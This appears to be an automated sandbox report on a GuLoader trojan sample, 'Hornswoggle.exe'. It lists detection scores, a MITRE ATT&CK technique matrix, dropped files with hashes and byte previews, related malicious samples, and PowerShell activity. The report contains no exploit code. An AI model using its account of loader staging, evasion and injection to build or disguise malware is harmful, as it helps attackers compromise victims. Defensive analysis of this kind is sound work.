Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Hornswoggle.exe

0_2_0040322B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	111 Process Injection	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Hornswoggle.exe	50%	ReversingLabs	Win32.Trojan.Guloader
Hornswoggle.exe	72%	Virustotal		Browse
Hornswoggle.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsx8391.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://ion=v4.5()T	0%	Avira URL Cloud	safe
http://crl.mp(	0%	Avira URL Cloud	safe
http://www.microsoft.E	0%	Avira URL Cloud	safe
http://www.microsoft.M/	0%	Avira URL Cloud	safe
http://www.microsoft.c#	0%	Avira URL Cloud	safe
http://crl.microsoftS	0%	Avira URL Cloud	safe
http://www.mi%.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.4492676898.0000000005F06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ion=v4.5()T	powershell.exe, 00000002.00000002.4490121510.00000000031D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	Hornswoggle.exe	false		high
http://crl.micro	powershell.exe, 00000002.00000002.4496440513.0000000008701000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mp(	powershell.exe, 00000002.00000002.4490074334.000000000318A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.4492676898.0000000005F06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.4492676898.0000000005F06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.4492676898.0000000005F06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.4492676898.0000000005F06000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoftS	SIHClient.exe, 00000004.00000002.2594005661.000001FC9B7C1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.E	SIHClient.exe, 00000004.00000002.2594005661.000001FC9B7C1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.M/	powershell.exe, 00000002.00000002.4496440513.0000000008701000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lBjq	powershell.exe, 00000002.00000002.4490278168.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.c#	powershell.exe, 00000002.00000002.4496440513.0000000008701000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Hornswoggle.exe	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.4490278168.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.4490278168.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.mi%.	powershell.exe, 00000002.00000002.4496440513.0000000008701000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.mi	powershell.exe, 00000002.00000002.4494109911.0000000007577000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583356
Start date and time:	2025-01-02 14:35:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Hornswoggle.exe
Detection:	MAL
Classification:	mal76.troj.evad.winEXE@4406/21@0/0
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 89 Number of non-executed functions: 39
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for powershell

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 199.232.214.172, 20.3.187.198, 40.69.42.241, 13.107.246.45, 23.1.237.91
Excluded domains from analysis (whitelisted): www.bing.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6600 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:35:55	API Interceptor	1407x Sleep call for process: powershell.exe modified
08:36:13	API Interceptor	2x Sleep call for process: SIHClient.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	8n26gvrXUM.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690	Get hash	malicious	Unknown	Browse	199.232.210.172
	5fr5gthkjdg71.exe	Get hash	malicious	Quasar, R77 RootKit	Browse	199.232.214.172
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	hcxmivKYfL.exe	Get hash	malicious	RedLine	Browse	199.232.210.172
	WN3Y9XR9c7.exe	Get hash	malicious	AsyncRAT	Browse	199.232.210.172
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	199.232.214.172
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	199.232.210.172
	ROtw3Hvdow.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	vfrcxq.ps1	Get hash	malicious	AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT	Browse	199.232.210.172

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsx8391.tmp\nsExec.dll	Overheaped237.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	anziOUzZJs.exe	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe	Get hash	malicious	Unknown	Browse
	PTFE Coated Butterfly Valve Picture#U00b7pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse
	cuenta iban-ES65.exe	Get hash	malicious	GuLoader	Browse
	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse
	cuenta iban-ES65.exe	Get hash	malicious	GuLoader	Browse
	rResegregation.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	4761
Entropy (8bit):	7.945585251880973
Encrypted:	false
SSDEEP:	96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
MD5:	77B20B5CD41BC6BB475CCA3F91AE6E3C
SHA1:	9E98ACE72BD2AB931341427A856EF4CEA6FAF806
SHA-256:	5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
SHA-512:	3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
Malicious:	false
Preview:	MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.\|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.\|.....VQ....<........... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	data
Category:	dropped
Size (bytes):	340
Entropy (8bit):	3.262470744919491
Encrypted:	false
SSDEEP:	6:kKKeh5+7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:ihLkPlE99SCQl2DUeXJlOA
MD5:	CB065E947339F872DD2ACC15E815893D
SHA1:	2AAD66E9591270919C87DBAC90F9576437E39A86
SHA-256:	098D05813D0B33E5C0246FB98564FE0FC27C20A981F542DD61015285AEB84724
SHA-512:	B3E6497D170823FD18ADF1CC2DB4DFD61B6AB4CC5100AC3481C83EB5F9DDBEC134752A5206686B23D68C310F4EE4E116DB31A6B71525082A1876A2E92EF104D5
Malicious:	false
Preview:	p...... .........#J.]..(....................................................... ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\justifikationssager.lnk

Download File

Process:	C:\Users\user\Desktop\Hornswoggle.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	784
Entropy (8bit):	3.2986307348167965
Encrypted:	false
SSDEEP:	12:8wl0BsXU1SRXUkl1klx0zMJGc3IrR6/rNJkKAh4t2YZ/elFlSJm:8SNR1Ew4FIrRC5HALqy
MD5:	41FD8E4EBDAEBAA971A216A04BE3B980
SHA1:	4208FFCF310F95567C8C768C43CDDB82C02D296E
SHA-256:	5B65AA105A23A93B12C9DF88FF9E94CFA48B9AB4B970EADC392FCA3F2499401A
SHA-512:	58FC0E6E858E865400281F4F029FFF8A9C24E1835068CAB993B6A6FD3890FF4AA009955714BE9F33DA9963C8983A36B28B0651D396B7C7227C305ED9DEEF7BED
Malicious:	false
Preview:	L..................F........................................................;....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....h.2...........Filial195.plo.L............................................F.i.l.i.a.l.1.9.5...p.l.o.............\.....\.....\.....\.....\.F.i.l.i.a.l.1.9.5...p.l.o.A.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.c.h.i.n.a.\.M.i.x.e.r.e.n.\.v.e.r.b.a.l.i.s.e.s.\.N.i.c.h.o.l.l.s.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22j0iksa.c4a.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccpaf1wx.ii2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzztiy4l.vyy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl3n24ot.jsd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsr814E.tmp

Download File

Process:	C:\Users\user\Desktop\Hornswoggle.exe
File Type:	data
Category:	dropped
Size (bytes):	3787883
Entropy (8bit):	1.4324947210684025
Encrypted:	false
SSDEEP:	12288:6Wkg/tbnsTltNBQ9okBin8DgNGAk5GJNl:6WfVbsTHNBQakBkJAAiGJf
MD5:	410E3671969FF3F7BF648B09E60EA68A
SHA1:	076217930B49D35C9618AB37A67D4D3FE4981538
SHA-256:	2FE3896919449EFC149ADB77F1AA0AD437D0743EF803A3FD99784CCE6BF76D7D
SHA-512:	0DB36AF5B0A8D3EEA52FB7669F81C606E38D3DCD77ADBC1292BF190B7117234A375B6DA78D7D77ED627BA64D64B44E43F9ADE496D9434CAE0EC01664D734FD05
Malicious:	false
Preview:	."......,................................!......."...............................................k\.........................................................................................................................................................................................J...\...............j...............................................................................................................................g...............7...f...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsx8391.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Hornswoggle.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	4.994861218233575
Encrypted:	false
SSDEEP:	96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
MD5:	B648C78981C02C434D6A04D4422A6198
SHA1:	74D99EED1EAE76C7F43454C01CDB7030E5772FC2
SHA-256:	3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
SHA-512:	219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Overheaped237.exe, Detection: malicious, Browse Filename: 66776676676.exe, Detection: malicious, Browse Filename: anziOUzZJs.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious, Browse Filename: PTFE Coated Butterfly Valve Picture#U00b7pdf.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: cuenta iban-ES65.exe, Detection: malicious, Browse Filename: rResegregation.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls\rancheria.pro

Download File

Process:	C:\Users\user\Desktop\Hornswoggle.exe
File Type:	data
Category:	dropped
Size (bytes):	947949
Entropy (8bit):	0.15996398773946943
Encrypted:	false
SSDEEP:	768:oASe3amtYNbHv0lnDzgcAUOkEuypx/zSFad:
MD5:	B34FC802327D0F5F02281FD236BD67C6
SHA1:	E7E1E1E5288F16B42FB8B5A62C9B33A4B8D02341
SHA-256:	1B795733FFC880D3DECD0A23BD3CCB22AC6A80EEA5729D407336D891F0523884
SHA-512:	DD170F304175543B07EABE1F09D0548DBE9C332074A0493D1BC4400494356104E16D47C684EB04A04447283427612B1EAE5C40BBB42E087F77FE72C841B9DB7B
Malicious:	false
Preview:	..........................................................................................................................................................................................................e..................................................................................................................................................................................................................................................................... ...............................................................................................)......................................................................K...............'................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis

Download File

Process:	C:\Users\user\Desktop\Hornswoggle.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4351), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	73657
Entropy (8bit):	5.146131456060231
Encrypted:	false
SSDEEP:	1536:fkZfV8us24mBZDzFYx+QgYKL+Vk2wsgCb7mb0Hh2HS8LWlVhl2LaRPUBl0EsW:fkZN/U+QZKMk2wGHh2HN6GL/Bv
MD5:	905438AF78036205843C5026E99F0590
SHA1:	564A4A6CAA067C24346E8E6D08EF64ECC335A85B
SHA-256:	DC966CFA5212C29711424E3C044458EC1FBFA2F1F50C4A70ED301BD1CAFADF7C
SHA-512:	713F380C0CE236A183E2992D722A4376625A934481F389339E6EDF57862EFCD0DBDAA004B6378138EF79BFA2DCA7223F603F2CC32865BF3C370A9DF90AA528DA
Malicious:	true
